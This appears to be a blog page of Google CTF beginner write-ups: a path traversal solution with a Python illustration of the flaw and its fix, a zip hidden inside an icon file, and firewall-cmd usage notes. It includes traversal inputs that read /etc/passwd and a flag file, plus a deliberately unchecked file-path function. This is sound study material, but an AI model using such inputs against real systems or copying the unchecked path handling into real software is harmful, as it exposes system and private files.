2018/11/17

Google CTF Beginners Quest ADMIN UI

$ nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

Connect as instructed in the challenge statement. The menu item used to obtain the flag is 2) Read EULA/patch notes.

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
Version0.2
# Release 0.2
 - Updated library X to version 0.Y
 - Fixed path traversal bug
 - Improved the UX
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
Version0.3
# Version 0.3
 - Rollback of version 0.2 because of random reasons
 - Blah Blah
 - Fix random reboots at 2:32 every second Friday when it's new-moon.

The "Fixed path traversal bug" entry in Version0.2 is the hint. Version0.3 rolls back version 0.2, so path traversal is possible on this system.

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
2
The following patchnotes were found:
 - Version0.2
 - Version0.3
Which patchnotes should be shown?
../../../../../etc/passwd

----- snip -----

user:x:1337:1337::/home/user:

Among the entries in /etc/passwd, the only regular user is user.

Which patchnotes should be shown?
../../../../home/user/flag
CTF{DUMMY_FLAG}=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

Going on a hunch, I explored under /home/user and obtained the flag from /home/user/flag.
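The patch-notes reader behaves as if the requested name were joined to a base directory without any check. As an added example (not the challenge's code; the function names and the temporary directory layout are assumptions made for illustration), the unchecked join is shown beside a version that resolves the path and rejects anything outside the patch-notes directory:

```python
import os
import tempfile


def read_note_vulnerable(notes_dir, name):
    # Joins the requested name as-is, so "../" sequences walk out of notes_dir.
    with open(os.path.join(notes_dir, name)) as f:
        return f.read()


def read_note_checked(notes_dir, name):
    # Resolve ".." and symlinks first, then require the result to stay in notes_dir.
    base = os.path.realpath(notes_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("outside patchnotes directory: %r" % name)
    with open(target) as f:
        return f.read()


def demo():
    # Constructed layout (not the challenge's real one):
    #   <root>/app/patchnotes/Version0.2   and   <root>/home/user/flag
    root = tempfile.mkdtemp()
    notes = os.path.join(root, "app", "patchnotes")
    home = os.path.join(root, "home", "user")
    os.makedirs(notes)
    os.makedirs(home)
    with open(os.path.join(notes, "Version0.2"), "w") as f:
        f.write("# Release 0.2\n")
    with open(os.path.join(home, "flag"), "w") as f:
        f.write("constructed secret")

    results = {}
    for name in ("Version0.2", "../../home/user/flag"):
        try:
            checked = read_note_checked(notes, name)
        except PermissionError:
            checked = "blocked"
        results[name] = (read_note_vulnerable(notes, name), checked)
    return results


if __name__ == "__main__":
    for name, (vulnerable, checked) in demo().items():
        print(repr(name), "->", repr(vulnerable), "/", repr(checked))
```

The check compares resolved paths rather than filtering "../" out of the input string, so absolute paths and symlinks pointing outside the directory are rejected as well.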

Google CTF Beginners Quest FLOPPY

$ file foo.ico
foo.ico: MS Windows icon resource - 1 icon, 32x32, 16 colors

An ico file is provided. Nothing about the image itself stands out, so I inspected its contents in a binary editor.

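The magic number PK, which indicates a zip, appears in the latter half of the data, followed by zip-like strings such as driver.txt, so I saved all data from PK onward as a new file and unzipped it.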

$ unzip foo.zip
Archive:  foo.zip
  inflating: driver.txt
  inflating: www.com

The contents of driver.txt are the flag.

firewall-cmd usage

History from when traffic for the http service (port 80/tcp) was allowed. Services are bound to a zone.

$ firewall-cmd --get-active-zone
public
  interfaces: enp0s3

$ firewall-cmd --info-zone public
public (active)
  target: default
  icmp-block-inversion: no
  interfaces: enp0s3
  sources:
  services: ssh dhcpv6-client
  ports:
  protocols:
  masquerade: no
  forward-ports:
  source-ports:
  icmp-blocks:
  rich rules:

$ firewall-cmd --get-services
RH-Satellite-6 amanda-client amanda-k5-client bacula bacula-client bitcoin bitcoin-rpc bitcoin-testnet bitcoin-testnet-rpc ceph ceph-mon cfengine condor-collector ctdb dhcp dhcpv6 dhcpv6-client dns docker-registry dropbox-lansync elasticsearch freeipa-ldap freeipa-ldaps freeipa-replication freeipa-trust ftp ganglia-client ganglia-master high-availability http https imap imaps ipp ipp-client ipsec iscsi-target kadmin kerberos kibana klogin kpasswd kshell ldap ldaps libvirt libvirt-tls managesieve mdns mosh mountd ms-wbt mssql mysql nfs nfs3 nrpe ntp openvpn ovirt-imageio ovirt-storageconsole ovirt-vmconsole pmcd pmproxy pmwebapi pmwebapis pop3 pop3s postgresql privoxy proxy-dhcp ptp pulseaudio puppetmaster quassel radius rpc-bind rsh rsyncd samba samba-client sane sip sips smtp smtp-submission smtps snmp snmptrap spideroak-lansync squid ssh synergy syslog syslog-tls telnet tftp tftp-client tinc tor-socks transmission-client vdsm vnc-server wbem-https xmpp-bosh xmpp-client xmpp-local xmpp-server

$ firewall-cmd --info-service http
http
  ports: 80/tcp
  protocols:
  source-ports:
  modules:
  destination:

$ firewall-cmd --zone=public --add-service=http
success
$ firewall-cmd --reload
success